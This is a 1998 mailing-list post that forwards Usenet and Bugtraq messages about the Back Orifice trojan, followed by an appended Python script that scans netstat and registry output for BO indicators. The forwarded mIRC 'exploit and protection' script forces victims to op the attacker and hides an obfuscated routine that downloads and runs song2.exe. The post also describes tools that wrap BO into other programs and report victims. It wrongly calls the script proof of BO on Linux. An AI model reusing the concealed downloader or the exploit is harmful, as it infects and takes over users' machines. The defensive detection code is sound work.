“penang.island@usa.net” has submitted to the
“linux-biz@lege.com” mailing list his concerns about this trojan
coming into Linux Land.
———- Forwarded message ———-
From: penang.island@usa.net
To: linux-biz@lege.com
Dear all,
This is a message about the Back Orifice (BO) trojan. Included
in this message are several BO-related messages I obtained from the
various *crack* newsgroups, and one from the Bugtraq
mailinglist.
At first I thought BO only wreaked havoc on the Windoze platform,
— please read the first forwarded message, — but on the bugtraq
list, someone demonstrated that BO is alive and well on the BSD and
Linux platforms as well, — please read the second forwarded
message, from the Bugtraq mailing list. I also included clips of other
BO-related messages to give you a clear perspective of BO.
I have several concerns:
- The LGPL license, if I am not mistaken, does allow the
distribution of compiled libraries. The possibility of someone
hiding a BO trojan and distributing it under the LGPL license must
_NEVER_ be discounted.
- Call me paranoid if you must, but the “Halloween Papers”
exposed the possibility of Microsoft employing all kinds of dirty
tricks in wracking Linux. Hence, in addition to the usual FUD
tactics, it is _NOT_ inconceivable that some determined fanatics
from the Windoze camp may actually carry out what I have just
mentioned above.
- If that happened, what should we, the people from the Linux
community, do?
- Are there any precautions we can take in advance to prevent
that from happening?
- Not all of us are security experts, so it may be too much to
ask all Linux users to scan all the ports of their machines. Are
there any security programs in existence that can help Linux
users in preventing the BO trojan from infecting our machines?
- Linux is being employed in more and more businesses. The BO
trojan allows someone from the outside to monitor and scan the
infected machines, and if the infected machines are being used for
business purposes, trade secrets and business strategies may be
seriously compromised. If we are to promote the use of Linux in
business premises, we must take a pro-active stance in finding ways
to counter any possible effect of the BO trojan.
***DISCLAIMER***
I am _NOT_ a cracker, I do _NOT_ own nor will knowingly run any
of the below-mentioned programs. I am _NOT_ affiliated with any of
the people and/or organizations mentioned below either.
I have no way to know, and I haven’t had the time to prove the
validity of the information I’m including below. I apologize in
advance if all these seem unimportant or if anything resembling this
was ever posted in the past.
Please also take into consideration that most of the BO-related
messages were from the various *.crack* newsgroups populated by
boastful teenage script-runners. Some of the language they use is
offensive in nature, so please stop reading any further if you are
easily offended.
Thank You.
Sincerely,
Lee
penang.island@usa.net
- -------------------------------------------------------------
A forwarded message about the nature of the Back Orifice Trojan
- -------------------------------------------------------------

From: jim_porter@hotmail.com (Jim Porter)
Newsgroups: alt.2600,alt.2600.crackz,alt.2600.hackerz,alt.binairies.cracks,alt.cracks,alt.hack.nl
Subject: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning !!!
Date: Wed, 09 Sep 1998 12:27:32 GMT
Message-ID: <35f6722c.16857146@news.noord.bart.nl>
NNTP-Posting-Host: s02.zwolle.bart.nl

Back Orifice News

First, It seems that I'm getting a lot of questions from people who don't know what Back Orifice is about... and the rest probably don't care... or think they don't care about whatever it is.

Back Orifice is a program that will let people who don't have a clue about hacking get into YOUR computer and do ANYTHING they want. They can access all your banking/accounting records, credit card info, read your ICQ history, irc logs, your email (including received and sent and undeleted trash mail), they can get all the passwords to your ftp sites and websites, if you are running on a network they can move to all the other systems and modify anything, copy anything, upload anything AND destroy anything. A hacker can even keep a log of your keystrokes and take a snapshot of what you are viewing on your screen and take a look.

You probably think... oh I won't get it on my computer because I'm careful. Well ok then.. read no farther. You may not know that BO is showing up EVERYWHERE, in programs like greeting cards, jokes, cracks, something you may get in email and just click on, and it can even be loaded from browsing a web site. You might go to a site that simply says "We have moved.. click HERE to go to our new location." and a Java app. will load BO from there onto your system. There was a web site that had an example but it looks like Microsoft had them take it down. If I find another one I'll mention the url.
Personally, I have to admit that I didn't think Back Orifice would be such a big deal. After all, you have to execute a program on your computer that has BO in it, and it should be easy to detect it when it's running. HOWEVER, I've found SEVERAL really tricky versions that are wrapped up in programs we are all likely to encounter. And after reading so many articles about BO on the web I have a strong sense that they just think this is a minor nuisance and can be eliminated by watching the default port, and/or checking the registry where it normally loads. I say "ha,ha"

Consider these facts:

* Some versions of BO are modified so they are NOT detected by Norton or the normal detection programs that claim to detect it.

* There are BO support sites that offer programs that will wrap BO into any application and various other innovative utilities to help get it onto someone's system without them knowing. And there are programs that will plug into BO so that it will email the hacker who prepared the version you are installing and tell him/her "BO has been installed at: Your IP number" so they know your system is open for the hacker's access.

* Even if you run a BoWatch type program, they can take up to 10 mins to identify and turn off BO.. which gives someone who is watching your system (or who has just sent it to you wrapped in another program) plenty of time to go into your system and close then delete the BoWatch program. Of course it would not be so difficult for a programmer to just check for the "anti-BO" programs and deactivate them, or replace them with a version that doesn't work.. so you would have the "false security" of thinking you were protected when you see the "do nothing" program running.
See this story: Back Orifice "security" tools miss the mark
http://www.zdnet.com/pcweek/news/0817/20mbosec.html

The main problem with removing it is that it may be "hatched" when your system starts, meaning that another program is putting a new copy on a system during bootup. Often these BO removal programs think they cured your system but haven't fixed anything. Most just check the default location in your system's registry or watch the default port setting.

One way to detect if it's running on your system is to enter this command from your Start / Run menu; you can see if you have any ports in the 3,000's open. If you do, most likely that is BO running. BO's default address is 31377.

command /k netstat -n

(this doesn't seem to show up if you have a password version of BO unless the person who knows the password is on your computer)

Another thing you can do is click on Start / Find / Files and put "bofilemapping" (without the quotes) in the "Containing Text" field. Any matches you find have the BO trojan. If they are in your windows\system directory it is probably running. I have been told that you can be running several versions at the same time.

Run Regedit and look in here:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

Then check under "Run" "Runonce" for files like windll.dll (the default name the unmodified version of BO uses) or hello.abc

There are some very clever people out there that make it look VERY important if you are looking at your registry. It may say "Key file for Windows System Tray, do not delete" There are even MORE clever tricks that I don't want to mention here.

Another thing that can help you protect your data from BO access is to take advantage of the limitation that BO can't change to a directory with an ALT + 255 character in the name.
This means that if you drop to DOS and type MD hidden and after the "h" of hidden you hold your alt key and press 255 on your number pad, when you release your ALT key your cursor moves to the right one space. If you try to access this directory from Windows Explorer (or with BO) it will look like "hidden_" but if you try to see the files in that directory you will get an error message, saying something like this directory has been moved or deleted. The only way you can move files into and out of this directory is from DOS. You can use dos based file managing programs like List and DirMagic to access this directory so you don't have to type out all the file names. I haven't had time to experiment yet, but I'm hoping that Netscape will allow me to configure it to use a directory with alt + 255 in the name of the mail file.

Note: If you have contacts with the cDc people, please try to get the source code for this program for me. If you have any really good tips about BO let's share the info that I can't (or just don't want to) talk about in this newsletter. If you have found or created any modified versions of your own that the scanners don't detect, please send them to me: mailto:tblount@zebra.net?subject=BOserver

If you think you can write a program.. like Nuke Nabber.. that will detect the ip of the BO CLIENT when someone sweeps or connects to the boserver running on a system, I want to help you test it.

- -----------------------------------------------------------------------
A forwarded Bugtraq message, proving the existence of a cross-platform BO
- -----------------------------------------------------------------------

Message-ID: <199811131950.OAA02949@brampton1.netmatrix.net>
Date: Fri, 13 Nov 1998 14:50:32 -0500
From: System Administrator
To: BUGTRAQ@NETSPACE.ORG

Hi,

while debugging/hexing/disassembling mirc my friend slotmech last week found a mirc bug which allows to force users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has been notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.

cya, fs

--- cut here ---
;#; mIRC v5.41 hack protection & exploit by FeaRStorm
;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$
;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$
;#;
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;
;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$
;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$
;#;
;#; if you want to add this code to your own script please: ASK FIRST!

ctcp 1:userinfo*: antihack

alias antihack {
  if ($len($2) > 17 && $chr(91) isin $2-) {
    echo $active mIRC5.41 hack attempt from $nick
    .halt
  }
}

alias hackop {
  if ($2 == $null) {
    echo 3 *** Usage: /hackop nick #channel
    .halt
  }
  if ($me !ison $2) {
    echo 3 *** You aren't on that Channel!
    .halt
  }
  if ($1 !isop $2) {
    echo 3 *** $1 isn't opped on that channel!
    .halt
  }
  checklen $1
  .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $
}

alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
  .sockclose protx
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$
}

on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$
  .sockwrite -n protx
}

on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test
}

on 1:connect:checklen

on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  }
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
    .set %xcomplete 1
  }
  if ($lof(%xfilename) != 178306) {
    .timer 1 300 checklen
  }
}
unset %xinprog
unset %xfilename
unset %xlof
unset %xfirst
}
--- cut here ---

- -------------------------------------------------
A forwarded message regarding BO and its port usage
- -------------------------------------------------

From: nitalica@ibelong.2.pcrew (Nitallica)
Newsgroups: alt.2600,alt.2600.crackz,alt.2600.hackerz,alt.binairies.cracks,alt.cracks,alt.hack.nl
Subject: Re: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning !!!
Organization: Phrozen Crew
Date: Wed, 09 Sep 1998 13:51:52 GMT
Reply-To: nitalica@ibelong.2.pcrew
Message-ID: <361286ec.5251341@news.bhm.bellsouth.net>
NNTP-Posting-Host: host-209-214-105-195.bhm.bellsouth.net

On 9 Sep 1998 13:41:49 GMT, "Wolfsbane" writhed in pain while screaming:

>Ok, here's my question:
>
>Even if I did happen to get the BO Server on my computer, would McAfee
>PCFirewall protect me from anybody trying to get on my computer?
>

only if you have it configured to block every port. BO typically uses port 31337, unless specified otherwise.
--
Nitallica da GothiC AngeL
Phrozen Crew '98
Phrozen 4 Life
http://www.dejanews.com/group/dejanews.members.misc.phrozen.phrozencrew
http://SupportPC.cjb.net

- --------------------------------------------------------
Forwarded quotes about various BO-related programs/trojans
- --------------------------------------------------------

Speakeasy (v0.1 beta), 31Kb -- DLL, instructions, and C source code

Speakeasy is a ButtPlug that attempts to log into a predetermined IRC server on channel #BO_OWNED with a random username. It then proceeds to announce its IP address and a custom message every few minutes. This plugin is still in beta, and still missing a few features--mainly the ability to reestablish a link to the server when the connection is dropped, the ability to cope with being kicked out of a channel, and some assorted error checking/handling. Experiment with it, if you wish.

Silk Rope (v2.0), 41Kb -- EXE, instructions, and C source code

This is a little bit more of an elegant and sophisticated wrapper for the BO installer. (I prefer Silk Rope to Saran Wrap, myself...you know, a little more comfortable, a little less hot). Silk Rope binds your BO installer with a program of your choosing, saving the result as a single file. Great for modifying single-file installs. Presently, the icon is the generic single-file-install icon (an opening box with a window in the background), but I am working on making it "steal" the icon from the original executable. For now, you can change it with an icon utility such as Microangelo.

NEW IN THIS VERSION: Install/Infect Redesign--the installer (used to trojan-ize an existing EXE) has been internally modified and greatly simplified.

NEW IN PREVIOUS VERSION: Windows NT detection--the BO installer is not run if NT is detected (so that the nasty "password enumeration" error dialog box does not pop up). Simple Encryption--the BO installer is embedded into the EXE file using simple cryptography (with a random 8-bit key)

Saran Wrap (v1.1), 18Kb -- EXE, instructions, and C source code

A simple wrapper that will first install BO, then run an application of your choosing. I have heard that someone at CDC or the l0pht have something like this in the works, but I decided to release my own (with source code). The program's icon is the generic setup icon, but can be changed with an icon utility such as Microangelo.

Butt Trumpet (v1.1), 40Kb -- DLL, instructions, and C source code

Upon activation, this plugin will fire off an email to a predetermined SMTP server and email address (for instance, an anonymous remailer or a web-based email server). This way, victims could be infected via Usenet, without any knowledge ahead of time of who is being infected. The computer attempts to send an email message every 5 minutes until successful (for instance, if the user connects through dialup networking, their network may not have a valid internet connection when their computer first boots up). Once the message is successfully sent, a flag is set in the registry so that it is never sent again.

- ----------------------------------------------------------
Forwarded quotes regarding possible (windoze) anti-BO proggy
- ----------------------------------------------------------

There is a website www.groupaxion.com that has a downloadable file that seeks and eliminates back orifice.

Download AVP at www.avp.com and it will get rid of BO and NETBUS and some other trojans.

- -------------------------------------------------------------
Name of a lamely disguised BO trojan, downloadable from the Net
- -------------------------------------------------------------

ultracrack.exe

- ------------------
End forwarded quotes
- ------------------
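The two manual checks in the Back Orifice newsletter forwarded above (run netstat and look for the default port, then inspect the Run/RunOnce registry keys for windll.dll or hello.abc) can be applied to saved output rather than typed by hand. The script below is an added example for this archive, not code from the original post, from cDc, or from any tool named in the thread. It uses the default port 31337 quoted later in the thread, the two loader file names the newsletter gives, and constructed sample netstat and .reg text (not real captures); the names SAMPLE_NETSTAT, SAMPLE_REG, suspicious_sockets and suspicious_run_entries are assumptions of this example. As the newsletter itself warns, a renamed loader or a non-default port defeats both checks, so an empty result is not evidence of a clean machine.

```python
"""Offline triage for the two Back Orifice checks described in the thread:
sockets on the default port in `netstat -an` output, and Run/RunOnce
registry entries that point at the default BO loader file names.
Added example; sample inputs below are constructed, not real captures."""
import re

BO_DEFAULT_PORT = 31337                              # port quoted in the thread
BO_DEFAULT_LOADERS = {"windll.dll", "hello.abc"}     # file names quoted in the thread
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
)

# Constructed sample of Windows `netstat -an` output (assumption: not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1034        198.51.100.7:80        ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:137            *:*
"""

# Constructed sample in .reg export format; the "do not delete" value name mirrors
# the disguise the newsletter describes (assumption: not a real export).
SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Key file for Windows System Tray, do not delete"="C:\\WINDOWS\\SYSTEM\\windll.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"cleanup"="C:\\TEMP\\hello.abc"
"""

# One netstat row: proto, local addr:port, foreign addr, optional state.
NETSTAT_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")
REG_KEY = re.compile(r"^\[(.+)\]\s*$")
REG_VALUE = re.compile(r'^"([^"]*)"="(.*)"\s*$')


def suspicious_sockets(netstat_text, ports=(BO_DEFAULT_PORT,)):
    """Return (proto, local_port, state) for every socket bound to a watched port."""
    hits = []
    for line in netstat_text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue  # header, blank line, or a row we do not understand
        proto, _local, port, _foreign, state = m.groups()
        if int(port) in ports:
            hits.append((proto, int(port), state or ""))
    return hits


def suspicious_run_entries(reg_text, loaders=BO_DEFAULT_LOADERS):
    """Return (key, value_name, data) for Run/RunOnce values whose target file
    name is one of the known loader names, regardless of the value's label."""
    hits, current_key = [], None
    for line in reg_text.splitlines():
        k = REG_KEY.match(line)
        if k:
            current_key = k.group(1)
            continue
        v = REG_VALUE.match(line)
        if not v or current_key not in RUN_KEYS:
            continue
        name, data = v.groups()
        # .reg files escape backslashes; unescape, then keep the file name only.
        target = data.replace("\\\\", "\\").rsplit("\\", 1)[-1].lower()
        if target in loaders:
            hits.append((current_key, name, data))
    return hits


if __name__ == "__main__":
    for hit in suspicious_sockets(SAMPLE_NETSTAT):
        print("socket on BO default port:", hit)
    for hit in suspicious_run_entries(SAMPLE_REG):
        print("Run-key entry pointing at a known BO loader name:", hit)
```

The registry check deliberately matches on the file name in the value data rather than on the value name, because the newsletter's point is that the name can be made to read like a legitimate system component; the netstat check only sees the default port, which is the limitation the newsletter calls out for BoWatch-style tools as well.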